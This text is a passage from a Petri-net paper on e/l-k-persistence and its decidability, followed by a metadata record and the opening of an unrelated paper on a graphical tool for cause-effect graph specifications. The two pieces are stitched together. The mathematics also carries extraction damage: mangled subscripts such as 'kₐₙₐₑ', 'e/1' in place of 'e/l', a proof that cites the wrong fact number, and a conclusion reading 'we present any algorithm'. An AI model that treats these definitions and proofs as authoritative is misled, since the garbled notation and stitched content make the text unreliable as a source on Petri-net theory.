- **EE Net Persistence Problem:** Is the net \( S \) e/e-persistent?
- **LL Net Persistence Problem:** Is the net \( S \) l/l-persistent?
- **EL Net Persistence Problem:** Is the net \( S \) e/l-persistent?
The proofs of decidability of the above problems need to put into work a very efficient result of Valk/Jantzen [18] and benefit from the decidability of reachability problem (more specifically - decidability of the Set Reachability Problem for rational convex sets).
The alternative proof of Theorem 9 uses exactly the same proving technique as the proofs of decidability of the persistence problems mentioned above.
3 Properties of e/l-persistence
3.1 Hierarchy of e/l-persistence
In the previous section we defined three kinds of persistence. Now, we extend the hierarchy mentioned above with an infinite hierarchy of e/l-persistent steps.
Definition 10 (E/l-persistent steps - an infinite hierarchy).
Let $S = (P, T, F, M_0)$ be a p/t-net, let $M$ be a marking. We call a step $M \rightarrow M'$:
- e/l-0-persistent iff it is e/o-persistent (the execution of an action $a$ does not disable any other action);
- e/l-1-persistent iff $(\forall b \in T, b \neq a) \ M_b \Rightarrow [M_{ab} \lor (\exists c \in T) M_{acb}]$ (the execution of an action $a$ pushes the execution of any other enabled action away for at most 1 step);
− e/l-2-persistent iff (∀b ∈ T, b ≠ a) Mb ⇒ (∃w ∈ T*) |w| ≤ 2 ∧ Mawb (the execution of an action a pushes the execution of any other enabled action away for at most 2 steps);
− e/l-k-persistent for some k ∈ N iff (∀b ∈ T, b ≠ a) Mb ⇒ (∃w ∈ T*) |w| ≤ k ∧ Mawb (the execution of an action a pushes the execution of any other enabled action away for at most k steps);
− e/l-∞-persistent iff (∀b ∈ T, b ≠ a) Mb ⇒ (∃w ∈ T*) Mawb (the execution of an action a pushes the execution of any other enabled action away).
**Remark:** Note that e/l-∞-persistent steps are exactly e/l-persistent steps.
Directly from Definition 10 we get the
**Fact 4** Let S = (P, T, F, M0) be a p/t-net, let M be a marking. If the step MaM′ is e/l-k-persistent for some k ∈ N, then it is also e/l-i-persistent for every i ≥ k.
**Definition 11.** Let S = (P, T, F, M0) be a p/t-net, M be a marking and k ∈ N. Marking M is e/l-k-persistent iff for every action a ∈ T that is enabled in M the step Ma is e/l-k-persistent. P/t-net S = (N, M0) is e/l-k-persistent iff every marking reachable in S is e/l-k-persistent. We denote the class of e/l-k-persistent p/t-nets by Pe/l-k.

**Fig. 6.** A p/t-net (for Ex.3) that is not e/l-k-persistent for any k ∈ N
**Example 3.** Let us look at the example of Fig. 6. Both actions a and b are enabled in the initial marking. After the execution of the action a, the action b is never enabled again, and after the execution of the action b, the action a is never enabled again. So the net can not be e/l-k-persistent for any natural number k.
**Example 4.** Let us look at the example of Fig. 4. The net is not e/l-0-persistent but it is e/l-1-persistent.
**Example 5.** Let us look at the example of Fig. 7. The only possible situation for temporary disabling an action by another one is the execution of a that disables b. And then b could be enabled again after the execution of the sequence cde, so after 3 steps. Hence, the net is e/l-3-persistent, and obviously not e/l-2-persistent.
The direct conclusion from Fact 4 and Definition 11 is as follows:
**Fact 5** Let \( S = (P, T, F, M_0) \) be a p/t-net, \( M \) be a marking, and \( k \in \mathbb{N} \). If the marking \( M \) is e/l-\( k \)-persistent, then it is also e/l-\( i \)-persistent for every \( i \geq k \). If the net \( S \) is e/l-\( k \)-persistent, then it is also e/l-\( i \)-persistent for every \( i \geq k \).
**Remark:** Based on this Fact 5 we can extend the existing hierarchy of persistent nets as shown in Figure 8.
### 3.2 Related decision problems
- **EL-k Step Persistence Problem**
- **EL-k Marking Persistence Problem**
Let \( k \in \mathbb{N} \) be a fixed natural number. Now we can formulate basic problems regarding the concept of e/l-k-persistence.
The first problem is as follows:
**EL-k Step Persistence Problem**
*Instance:* P/t-net $S$, marking $M$, action $a \in T$ enabled in $M$.
*Question:* Is the step $Ma$ e/l-k-persistent?
**Theorem 3.** The EL-k Step Persistence Problem is decidable (for any $k \in \mathbb{N}$).
*Proof.* An algorithm to check if a step $Ma$ is e/l-k-persistent (for some $k \in \mathbb{N}$) for a given net $S = (N, M_0)$:
Let us build the part of the depth of $k+1$ (we call it the $(k+1)$-component) of the reachability tree of $(N, M')$, where $M'$ is a marking obtained from $M$ by execution of $a$. The step $Ma$ is e/l-k-persistent if for every action $b \in T$, such that $a \neq b$ and $b$ is enabled in $M$, there is a path in the $(k+1)$-component of the reachability tree of $(N, M')$ containing an arc labeled by $b$.
Let us introduce another problem:
**EL-k Marking Persistence Problem**
*Instance:* P/t-net $S = (N, M_0)$, marking $M$.
*Question:* Is the marking $M$ e/l-k-persistent?
**Theorem 4.** The EL-k Marking Persistence Problem is decidable (for any $k \in \mathbb{N}$).
*Proof.* For every action $a \in T$ that is enabled in a marking $M$, we check if a step $Ma$ is e/l-k-persistent (for some $k \in \mathbb{N}$) for a given net $S = (N, M_0)$, using the algorithm of Theorem 3.
*EL-k Net Persistence Problem*
Let us consider the following problem:
**EL-k Net Persistence Problem**
*Instance:* P/t-net $S = (N, M_0)$, $k \in \mathbb{N}$.
*Question:* Is the net $S$ e/l-k-persistent?
To solve this problem we must prove a set of auxiliary facts.
From this moment, let $S = (N, M_0)$ be an arbitrary p/t-net.
Let us define the following set of markings:
$E_{a,b} = \{ M \in \mathbb{N}^P \mid Ma \land Mb \}$- the set of markings enabling actions $a$ and $b$ simultaneously.
Let us define \( \text{minE}_{a,b} \in \mathbb{N}^P \), the minimum marking enabling actions \( a \) and \( b \) simultaneously: if \((\bullet a[i] = 1 \lor \bullet b[i] = 1)\) then \( \text{minE}_{a,b}[i] := 1 \) else \( \text{minE}_{a,b}[i] := 0 \) (for \( i = \{1, \ldots, |P|\} \)).
Note that \( E_{a,b} = \text{minE}_{a,b} + \mathbb{N}^P \).
- **Mutual Enabledness Reachability Problem**
Let us formulate an auxiliary problem:
**Mutual Enabledness Reachability Problem**
**Instance:** \( P/t \)-net \( S = (N, M_0) \), actions \( a, b \in T \).
**Question:** Is there a marking \( M \) such that \( M \in E_{a,b} \) and \( M \in [M_0] \)? (Is there a reachable marking \( M \) such that actions \( a \) and \( b \) are both enabled in \( M \)?)
**Theorem 5.** The Mutual Enabledness Reachability Problem is decidable.
**Proof.** Let \( M = \text{minE}_{a,b} \). We build a coverability graph for the \( p/t \)-net \( S \). We check whether in the graph exists a vertex corresponding to an \( \omega \)-marking \( M' \) such that \( M' \) covers \( M \). If so, then actions \( a \) and \( b \) are simultaneously enabled in some reachable marking of the net \( S \). Otherwise, those transitions are never enabled at the same time.
Let \( \text{Min}[M_0] \) be the set of minimal (wrt \( \leq \)) reachable markings of the net \( S \). As members of \( \text{Min}[M_0] \) are incomparable, the set \( \text{Min}[M_0] \) is finite, by Lemma 4.
Let us denote by \( \text{RE}_{a,b} \) the set of all reachable markings of the net \( S \) enabling actions \( a \) and \( b \) simultaneously: \( \text{RE}_{a,b} = \{ M \in [M_0] | \text{Ma} \land \text{Mb} \} = E_{a,b} \cap [M_0] \).
Let \( \text{Min}(\text{RE}_{a,b}) \) be a set of all minimal reachable markings of the net \( S \) enabling action \( a \) and \( b \) simultaneously.
- **Results of Valk and Jantzen**
In order to construct the set \( \text{Min}(\text{RE}_{a,b}) \), we put into work the theory of residue sets of Valk/Jantzen [18].
**Definition 12 (Valk/Jantzen [18]).** A subset \( X \subseteq \mathbb{N}^k \) has property \( \text{RES} \) if and only if the problem "Does \( \downarrow v \) intersect \( X \)?" is decidable for any \( \omega \)-vector \( v \in \mathbb{N}^k \).
**Theorem 6 (Valk/Jantzen [18]).** Let \( X \subseteq \mathbb{N}^k \) be a right-closed set. Then the set \( \text{Min}(X) \) is effectively computable if and only if \( X \) has property \( \text{RES} \).
• Set Reachability Problem
We also use the fact of decidability of the Set Reachability Problem for rational convex sets (Def. 5.7), proved in [2].
Set Reachability Problem
Instance: P/t-net \( S = (N, M_0) \) and a set \( X \subseteq \mathbb{N}^P \).
Question: Is there a marking \( M \in X \), reachable in \( S \)?
Theorem 7. The Set Reachability Problem is decidable for rational convex sets in p/t-nets.
The Set Reachability Problem is a generalization of the classical Marking Reachability Problem. The proof uses decidability of the Reachability Problem.
• Minimal reachable markings enabling two actions simultaneously
Now we are ready to prove:
Proposition 2. The set \( \text{Min}(RE_{a,b}) \) can be effectively constructed for a given net \( S = (P,T,F,M_0) \).
Proof. Let us take the right closure \( RE_{a,b} \uparrow \) of the set \( RE_{a,b} \).
Note that \( \text{Min}(RE_{a,b}) = \text{Min}(RE_{a,b} \uparrow) \). To show that the set of minimal elements of the set \( RE_{a,b} \uparrow \) is effectively computable, it is enough to demonstrate that the set \( RE_{a,b} \uparrow \) has the property RES (i.e. for any \( \omega \)-vector \( v \in \mathbb{N}^P \) the problem "\( (\downarrow v \cap RE_{a,b} \uparrow \neq \emptyset) \)" is decidable) and apply Theorem 6.
Let \( X = \downarrow v \cap E_{a,b} \), where \( E_{a,b} = \min E_{a,b} + \mathbb{N}^P \). Let us notice, that \( \downarrow v \) is a convex set, hence rational (Proposition 1). The set \( E_{a,b} \) is also a rational convex set. As an intersection of convex rational sets, the set \( X \) is convex and rational (Theorem 1) as well.
Hence, putting into work decidability of the Set Reachability Problem for rational convex sets (Theorem 7), we decide whether any marking from the set \( X \) is reachable in \( S \). Therefore, we can decide whether the set \( X' = \downarrow v \cap RE_{a,b} \) is nonempty. (It is the case when at least one marking from the set \( X \) is reachable in \( S \).) Let us notice that \( \downarrow v \cap RE_{a,b} \uparrow \) is nonempty if and only if the set \( X' \) is nonempty. That is why the set \( RE_{a,b} \uparrow \) has the property RES, and consequently the set \( \text{Min}(RE_{a,b}) \) is effectively computable by Theorem 6.
Example 6. The set of all minimal reachable markings of the net depicted in Figure 9 enabling action \( a \) and \( b \) simultaneously, is \( \text{Min}(RE_{a,b}) = \{[1,1,1],[2,0,1]\} \).
Proposition 3. If there exists a marking \( M \in RE_{a,b} \) such that the execution of an action \( a \) in \( M \) pushes the execution of an action \( b \) away for more than \( k \) steps (for some \( k \in \mathbb{N} \)), then there exists some minimal marking \( M' \in \text{Min}(RE_{a,b}) \) such that the execution of an action \( a \) in \( M' \) pushes the execution of an action \( b \) away for more than \( k \) steps, too.
Proof. Let $M$ be a marking, such that the execution of an action $a$ in $M$ pushes the execution of an action $b$ away for more than $k$ steps (for some $k \in \mathbb{N}$). Let $M' \in \text{Min} (\text{RE}_{a,b})$ such that $M' \preceq M$. Such a marking has to exist. Suppose that there is a string $w \in T^*$, $|w| \leq k$ such that $M'awb$. Then obviously also $Mawb$ (from the monotonicity property - Fact 2). We obtain a contradiction. Hence, the execution of an action $a$ in $M'$ postpones the execution of $b$ for more than $k$ steps.
**EL-k Transition Persistence Problem and EL-k Net Persistence Problem**
Now, we are ready to introduce the following problem:
**EL-k Transition Persistence Problem**
*Instance:* P/t-net $S = (N, M_0)$, ordered pair $(a, b) \in T \times T, b \neq a$, $k \in \mathbb{N}$.
*Question:* Is there a reachable marking $M \in [M_0]$ such that $Ma \land Mb \land \neg (\exists w \in T^*) |w| \leq k \land Mawb$? (Does $a$ postpone $b$ for more than $k$ steps?)
**Theorem 8.** The EL-k Transition Persistence Problem is decidable.
*Proof.* We introduce an algorithm of deciding if an action $a$ pushes the execution of an action $b$ away for more than $k$ steps in some reachable marking $M$.
1. We check whether both actions $a$ and $b$ are enabled in some reachable marking (using decidability of Mutual Enabledness Reachability Problem).
(a) If not, we answer NO.
(b) Otherwise:
i. We build the set $\text{Min} (\text{RE}_{a,b})$. This set can be effectively computed by Proposition 2 using Valk/Jantzen algorithm.
ii. For all markings \( M_1 \in \text{Min}(\text{RE}_{a,b}) \):
\[
M_2 := M_1 a.
\]
We build an initial part of the depth of \( k+1 \) (the \( (k+1) \)-component) of the reachability tree of \( (N, M_2) \). If the piece has an edge labeled by \( b \), we answer NO. Otherwise we answer YES.
And now the proof of decidability of the EL-k Net Persistence Problem is ready.
**Theorem 9.** The EL-k Net Persistence Problem is decidable (for any \( k \in \mathbb{N} \)).
**Proof.** \( S \) is \( e/1-k \)-persistent iff the algorithm solving EL-k Transition Persistence Problem answers NO for all ordered pairs \( (a, b) \in T \times T, a \neq b \).

**Example 7.** Let us check whether the action \( a \) of the net \( S \) of Figure 4 postpones the action \( b \) for more than 1 step.
Actions \( a \) and \( b \) are both enabled in the initial marking.
The set \( \text{Min}(\text{RE}_{a,b}) \) consists of a single marking \( M_1 = [1,0] \). We take \( M_2 = M_1 a = [0,1] \). We build a 2-component of the reachability tree of the net \( (S, M_2) \).
The tree is depicted in Figure 10. The tree has an edge labeled by \( b \) so the action \( a \) does not postpone the action \( b \) for more than 1 step.
**EL-k Transition Persistence Problem - an alternative approach**
In order to show decidability of the EL-k Net Persistence Problem we can use the technique used for proving decidability of LL Net Persistence Problem and EL Net Persistence Problem, presented in [2].
Again, we deal with the EL-k Transition Persistence Problem, crucial for the proof. We show an alternative proof of decidability of that problem.
**EL-k Transition Persistence Problem**
**Instance:** P/t-net \( S = (N, M_0) \), ordered pair \( (a, b) \in T \times T, b \neq a, k \in \mathbb{N} \).
**Question:** Is there a reachable marking \( M \in [M_0] \) such that
\[
Ma \land Mb \land \neg(\exists w \in T^*) |w| \leq k \land Mawb
\]
Let us define, in order to reformulate the problem above, the following sets of markings:
$E_a = \{ M \in NP \mid Ma \}$ - markings enabling $a$
$E_b = \{ M \in NP \mid Mb \}$ - markings enabling $b$
$E_{a(k)b} = \{ M \in NP \mid (\exists w \in T^*) |w| \leq k \land Mawb \}$ - markings enabling $a$ such that, after the execution of $a$, the action $b$ is potentially enabled after at most $k$ steps.
Now we can reformulate the question of the problem above:
**Question**: Is the set $E_a \cap E_b \cap (NP - E_{a(k)b})$ reachable in $(N, M_0)$?
Let us look again at Theorem 9.
**Theorem 9** The EL-$k$ Net Persistence Problem is decidable (for any $k \in \mathbb{N}$).
**Proof.** First note that, by the monotonicity property (Fact 2), the set $E_a \cap E_b \cap (NP - E_{a(k)b})$ is convex, thus rational (by Proposition 1). The rational expressions for $E_a$ and $E_b$ are $E_a = a + N^k$ and $E_b = b + N^k$. Clearly, the set $E_{a(k)b}$ is right-closed, by the monotonicity property. We shall prove that it has the property RES. Namely, $\downarrow v (v \in NP)$ intersects $E_{a(k)b}$ if and only if $a \leq v$ (i.e. $a$ is enabled in $v$) and there is a path in the reachability tree, limited to $(k+1)$ first levels, of the net $(N, v')$, where $v'$ is an $\omega$-marking obtained from $v$ by the execution of $a$, containing an arc labelled by $b$. It is obviously decidable. Hence, the set $E_{a(k)b}$ has the property RES, thus (by Theorem 6) the set $\text{Min}(E_{a(k)b})$ is effectively computable. As $E_{a(k)b}$ is right-closed, we get the rational expression for it: $E_{a(k)b} = \text{Min}(E_{a(k)b}) + NP^*$. Finally, using Theorem 10 of Ginsburg/Spanier\cite{8}, we compute rational expression for $E_a \cap E_b \cap (NP - E_{a(k)b})$ and Theorem 9 yields decidability of the problem.
### 3.3 Collapsing of the hierarchy of $e/l$-persistence
#### k-enabledness
Let us recall the well-known fact, that follows from the Dickson’s Lemma (Lemma 1).
**Fact 6** Every infinite sequence of markings contains an infinite increasing (not necessarily strictly) subsequence of markings.
Recall also that p/t-nets have the monotonicity property - Fact 2.
Let us define the notion of k-enabledness.
**Definition 13 (k-enabledness).** Let $S = (P, T, F, M_0)$ be a p/t-net, let $M$ be a marking. For $k \in \mathbb{N}$ we say that the action $a \in T$ is $k$-enabled in the marking $M$ if and only if $\exists w \in T^*$, such that $|w| \leq k \land Mwa$.
Now, we can show:
**Lemma 2.** Let $S$ be a p/t-net. For an arbitrary $a \in T$ there exists a natural number $k_a \in \mathbb{N}$, such that in every marking $M$ the transition $a$ is $k_a$-enabled or it is dead.
**Proof.** Suppose that the lemma does not hold for some action $a \in T$. It means that for each $k \in \mathbb{N}$ there is a marking $M$ such that $a$ is not $k$-enabled but not dead. This means that $a$ is $k'$-enabled for some $k' > k$. Thus, there exists an infinite sets of markings $M_1, M_2, \ldots$ and integers $k_1 < k_2 < \ldots$, such that the action $a$ is live in each marking $M_i$ and it is not $k_i$-enabled in $M_i$ for all $i = 1, 2, \ldots$. Let us choose (by Fact 5) an infinite increasing sequence of markings $M_1 \leq M_2 \leq \ldots$. Since the action $a$ is live in $M_1$, it is $k$-enabled in $M_1$, for some $k \in \mathbb{N}$. As the strictly increasing sequence $k_1 < k_2 < \ldots$ is infinite, $k < k_i$ for some $j$. By the monotonicity property (Fact 2), the action $a$ is $k$-enabled, hence $k_i$-enabled in the marking $M_i$. Contradiction.
**Remark:** Note that the proof of Lemma 2 is purely existential, it does not present any algorithm for finding $k$.
Now, we are ready to formulate the main theorem of the section:
**Theorem 10.** If a p/t-net is e/l-persistent, then it is e/l-$k$-persistent for some $k \in \mathbb{N}$.
In words: Whenever an action is disabled by another one, it is pushed away for not more than $k$-steps.
**Proof.** If the net is e/l-persistent, then no action kills another enabled one. From the Lemma 2 we know, that if an action $a \in T$ is not dead then it is $k_a$-enabled. Let us take $K = \max\{k_a | a \in T\}$, for the numbers $k_a$ from the Lemma 2. One can see that every action in the net that is not dead, is $K$-enabled. Thus, the execution of any action may postpone the execution of an action $a$ for at most $K$ steps. So we have the implication: if a p/t-net is e/l-persistent, then it is e/l-$K$-persistent, for $K$ defined above.
**Remark:** As the proof of Lemma 2 explicitly uses the monotonicity property of p/t-nets, the Theorem 10 holds only for nets satisfying this property. The following example shows that Theorem 10 does not hold for nets without the monotonicity property (for instance, inhibitor nets).
**Example 8.** Let us look at the example of Fig. 11. We can see an inhibitor net and its computation such that for every $k \in \mathbb{N}$ one can push an action away for a distance greater than $k$ steps.
This net is live, hence it is e/l-persistent, but it is not e/l-$k$-persistent for any $k \in \mathbb{N}$.
In the infinite computation $achdacebeddaebebebeddadaeeeb\ldots$ the first $a$ pushes $b$ away for 1 step, the second - for 2 steps and every $k$-th $a$ - for $k$ steps.
Fig. 11. An inhibitor net for Ex.8
- Collapsing of the hierarchy - an effective proof
Finally, let us recall other decision results of [2]:
**Transitions Persistence Problems**
*Instance:* P/t-net S = (N, M₀), and transitions a, b ∈ T, a ≠ b.
*Questions (informally):*
EE-Persistence Problem: Does a disable an enabled b?
LL-Persistence Problem: Does a kill a live b?
EL-Persistence Problem: Does a kill an enabled b?
From [2] we know that the problems are decidable.
**Theorem 11.** For a given p/t-net S = (N, M₀) and a pair of transitions a, b ∈ T one can calculate a minimum number kₐₙₐₑ ∈ N such that a postpones an enabled b for at most kₐₙₐₑ steps (if such a number exists).
**Proof.**
- We check whether both actions a and b are enabled in some reachable marking (using decidability of Mutual Enabledness Reachability Problem). If not, kₐₙₐₑ does not exist (actions a and b are never enabled at the same time).
Otherwise:
- We ask whether a kills an enabled b (EL-Persistence Problem).
If YES then kₐₙₐₑ does not exist (a kills b)
else:
* We compute the set Min(REₐₙₐₑ). This set can be effectively computed by Proposition 2 using Valk/Jantzen algorithm.
* We build the initial part of reachability tree of the net S as long as from every M ∈ Min(REₐₙₐₑ) we get a marking M’ with the property that a path leads to a vertex M’ (it can be an empty path) such that M’b. Clearly, such part of the tree is finite, as we get the whole Min(REₐₙₐₑ) and for any M ∈ Min(REₐₙₐₑ) a finite path leading from M to a vertex M’ such that M’b. The maximum length of such paths is the desired number kₐₙₐₑ.
**Theorem 12.** If a p/t-net S = (N, M₀) is e/l-persistent, then it is e/l-k-persistent for some k ∈ N and such a k can be effectively computed.
Proof. For every pair \((a, b)\) of transitions we find \(k_{a,b}\) defined above. The number we are looking for is \(k = \max(k_{a,b} : a, b \in T)\).
We established that an action can not postpone another action (without killing it) indefinitely (Theorem 10). We proved, that if a p/t-net is e/l-persistent, then it is e/l-k-persistent for some \(k \in \mathbb{N}\). We showed that such a \(k\) exists and we present any algorithm for finding this \(k\).
4 Conclusions
It is shown in [1] that if we change the firing rule in the following way: only e/e-persistent computations are permitted, then we get a new class of nets (we call them nonviolence nets) which are computationally equivalent to Turing machines. We plan to investigate net classes, with firing rules changed (only e/l-k-persistent computations are allowed) and answer the question:
**Question 1:**
What is the computational power of nets created this way?
In this paper, we have investigated the hierarchy of persistence in p/t-nets. We would like to study the hierarchy of e/l-k-persistence in some extensions of p/t-nets, for instance nets with read arcs and reset nets. All results of the paper hold for nets with read arcs (11), as they can be simulated by classical Petri nets with self-loops with the same reachability set (but with distinct step semantics). On the contrary, only Lemma 2 and Theorem 10 hold (with the same proof) for other extended Petri nets possessing the monotonicity property (e.g. reset, double, transfer nets), but the results supported with the fact of decidability of the Reachability Problem (Proposition 2, Theorem 3, Theorem 14) cannot be applied to those nets, because of undecidability of the Reachability Problem in them (see [7]).
References
|
{"Source-Url": "http://export.arxiv.org/pdf/1512.01952", "len_cl100k_base": 13445, "olmocr-version": "0.1.49", "pdf-total-pages": 23, "total-fallback-pages": 0, "total-input-tokens": 72893, "total-output-tokens": 15913, "length": "2e13", "weborganizer": {"__label__adult": 0.0004069805145263672, "__label__art_design": 0.0004987716674804688, "__label__crime_law": 0.00061798095703125, "__label__education_jobs": 0.0029735565185546875, "__label__entertainment": 0.00010776519775390624, "__label__fashion_beauty": 0.0002460479736328125, "__label__finance_business": 0.0005712509155273438, "__label__food_dining": 0.0006356239318847656, "__label__games": 0.0011396408081054688, "__label__hardware": 0.0017080307006835938, "__label__health": 0.001613616943359375, "__label__history": 0.0005807876586914062, "__label__home_hobbies": 0.00026917457580566406, "__label__industrial": 0.001171112060546875, "__label__literature": 0.0005745887756347656, "__label__politics": 0.00048470497131347656, "__label__religion": 0.0008649826049804688, "__label__science_tech": 0.37109375, "__label__social_life": 0.00015425682067871094, "__label__software": 0.00975799560546875, "__label__software_dev": 0.6025390625, "__label__sports_fitness": 0.00039267539978027344, "__label__transportation": 0.0013360977172851562, "__label__travel": 0.0002570152282714844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 48641, 0.01613]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 48641, 0.50746]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 48641, 0.84124]], "google_gemma-3-12b-it_contains_pii": [[0, 1778, false], [1778, 4866, null], [4866, 6946, null], [6946, 9752, null], [9752, 12019, null], [12019, 14925, null], [14925, 17418, null], [17418, 19318, null], [19318, 20515, null], [20515, 22196, null], [22196, 23333, null], [23333, 25360, null], [25360, 26116, null], [26116, 27916, null], [27916, 30387, null], [30387, 33294, null], [33294, 34870, null], [34870, 36874, null], [36874, 39355, null], [39355, 42167, null], [42167, 43962, null], [43962, 46340, null], [46340, 48641, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1778, true], [1778, 4866, null], [4866, 6946, null], [6946, 9752, null], [9752, 12019, null], [12019, 14925, null], [14925, 17418, null], [17418, 19318, null], [19318, 20515, null], [20515, 22196, null], [22196, 23333, null], [23333, 25360, null], [25360, 26116, null], [26116, 27916, null], [27916, 30387, null], [30387, 33294, null], [33294, 34870, null], [34870, 36874, null], [36874, 39355, null], [39355, 42167, null], [42167, 43962, null], [43962, 46340, null], [46340, 48641, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 48641, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 48641, null]], "pdf_page_numbers": [[0, 1778, 1], [1778, 4866, 2], [4866, 6946, 3], [6946, 9752, 4], [9752, 12019, 5], [12019, 14925, 6], [14925, 17418, 7], [17418, 19318, 8], [19318, 20515, 9], [20515, 22196, 10], [22196, 23333, 11], [23333, 25360, 12], [25360, 26116, 13], [26116, 27916, 14], [27916, 30387, 15], [30387, 33294, 16], [33294, 34870, 17], [34870, 36874, 18], [36874, 39355, 19], [39355, 42167, 20], [42167, 43962, 21], [43962, 46340, 22], [46340, 48641, 23]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 48641, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-24
|
2024-11-24
|
8ac28f255d52e11e1cc8a2529b50f67cc5818cb8
|
New Graphical Software Tool for Creating Cause-Effect Graph Specifications
Ehlimana Krupalija, Šeila Bećirović, Irfan Prazina, Emir Cogo, and Ingmar Bešić
Abstract — Cause-effect graphing is a commonly used black-box technique with many applications in practice. It is important to be able to create accurate cause-effect graph specifications from system requirements before converting them to test case tables used for black-box testing. In this paper, a new graphical software tool for creating cause-effect graph specifications is presented. The tool uses standardized graphical notation for describing different types of nodes, logical relations and constraints, resulting in a visual representation of the desired cause-effect graph which can be exported for later usage and imported in the tool. The purpose of this work is to make the cause-effect graph specification process easier for users in order to solve some of the problems which arise due to the insufficient amount of understanding of cause-effect graph elements. The proposed tool was successfully used for creating cause-effect graph specifications for small, medium and large graphs. It was also successfully used for performing different types of tasks by users without any prior knowledge of the functionalities of the tool, indicating that the tool is easy to use, helpful and intuitive. The results indicate that the usage of standardized notation is easier to understand than non-standardized approaches from other tools.
Index terms — software quality, black-box testing, cause-effect graph, graphical software tool.
I. INTRODUCTION
Cause-effect graphing (CEG) was introduced as a black-box testing technique in 1970 as a new way of generating test cases for a given software product functionality [1]. It was later adopted as a standard black-box testing method in works such as [2], [3], [4] and [5]. Cause-effect graph specifications contain three different types of elements: nodes (causes, intermediates and effects), logical (Boolean) relations and dependency constraints. After creating the cause-effect graph specification from system requirements, different algorithms based on back-propagation of effect values through the graph such as [4], [6] and [7] can be used for deriving test case tables. These test case tables are then used for black-box testing the desired system.
The main difficulty in the usage of cause-effect graphs arises due to the large dimensionality of test cases. Each node can be in one of two states – active or inactive, which is why the total number of test cases is $2^{\text{number of causes}}$. It is very important to correctly specify all logical relations and constraints between causes and effects of the graph before generating the test case table by using the available algorithms. Usage of constraints reduces the feasible test case subset size, making the test case selection process easier and less costly [8]. Unfortunately, the definition of the most commonly used back-propagation algorithm for deriving test case tables from [4] contains many inconsistencies. Additionally, different types of constraints are often misinterpreted by users, which is why their usage is often omitted (e.g. MSK constrains in [9] and [10]). All of these problems are pointed out and explained in detail in [11]. Test-case-description-related problems (e.g. incomprehensible, abstract and poorly documented test cases) also pose a critical problem [12], which is why it is very important to correctly derive cause-effect graph element descriptions from system requirements. The lack of verification of the conformance of the cause-effect graph with the specification of the desired system leads to many problems with test case derivation from cause-effect graph specifications. For this reason, the usage of machine learning methods [13] and natural language processing algorithms [14] has recently been proposed for automatically converting system requirements to cause-effect graph specifications.
Another factor which increases the amount of errors in the cause-effect graph specification process is the misuse of graphical notation for representing cause-effect graph elements. Different types of notation are present in the available cause-effect graphing works and the lack of standardization between different approaches makes this process more error-prone. Some non-standard approaches regarding the notation used for depicting different logical relations are similar to the standardized notation such as [15], whereas in other cases such as [16] the notation is very different and may be hard to understand. Additionally, omitting intermediate nodes can lead to specifications which do not conform to system requirements or result in incorrect test case tables, as noted in [11]. This problem is also addressed in [14], which accentuates the importance of the conformance of cause-effect graph specifications and formal system requirements.
A limited number of software tools for aiding the process of creating cause-effect graph specifications is available. Most of these tools are not open-source and are not available for free usage. Only one available tool [17] contains graphical elements, whereas other tools such as [18] and [7] focus on the application of different CEG algorithms for deriving test case tables from cause-effect graph specifications provided by the user. The
from the relevant literature and other available tools is evaluation of the graphical tool by using different examples and comparison with other existing approaches. Section V contains the conclusions on the usability of the new software tool and for summarizing in section IV. Two surveys were conducted for determining the usability of the software tool and for its comparison to other available tools. The expected contributions of the work include:
- Introduction of a new software tool which uses standardized graphical notation for creating cause-effect graph specifications. The tool can also be used for exporting the specifications to .txt files and importing these files for later reuse and modification. Usage of this tool can help in reducing the time for generating black-box tests for a given system based on system requirements and offer output that conforms to the standard accepted notation present in the available literature.
- Analysis of the scalability of the graphical-tool-based approach for the specification of cause-effect graphs. Using a variety of small, medium and large graphs presented in related work, the proposed tool was evaluated in order to confirm that it can be successfully used for creating both simple and complex cause-effect graph specifications.
- The comparison of available software tools to the newly introduced graphical software tool in terms of usage of graphical elements and usability. Usability of the newly proposed tool and its comparison to other available tools were evaluated by conducting surveys for user-based evaluation.
This work is structured as follows. In section II, cause-effect graphs are introduced and their main elements are explained in detail. Background and related work are also discussed in this section. In section III, the graphical user interface and functionalities of the proposed software tool are explained. The evaluation of the graphical tool by using different examples from the relevant literature and other available tools is summarized in section IV. Two surveys were conducted for determining the usability of the new software tool and for comparison with other existing approaches. Section V contains the explanation of internal and external threats to validity of the conducted study, as well as its limitations. In section VI, the overall analysis of the software tool is conducted with its comparison to earlier approaches. Recommendations for further research and possible future enhancements of the tool are also given in this section.
II. PRELIMINARIES AND RELATED WORK
This section contains the necessary preliminaries for understanding the cause-effect graph specification process. In Section II.A. all types of cause-effect graph elements are defined: different types of nodes, logical relations and dependency constraints, which will be used in the proposed graphical software tool. Section II.B. contains the explanation of all related work in the field of research, including the wide usage of cause-effect graphs for different applications, available types of graphical notation and a systematic review of existing CEG software tools.
A. Cause-effect Graph Specification Elements
Cause-effect graph specification and its elements are defined and explained in many works such as [1], [2] and [4]. Every cause-effect graph contains three different types of elements – graph nodes, logical relations and dependency constraints. All defined graph nodes, regardless of their type, can be in one of two states – active (1) or inactive (0). Cause-effect graphs can contain three different types of nodes:
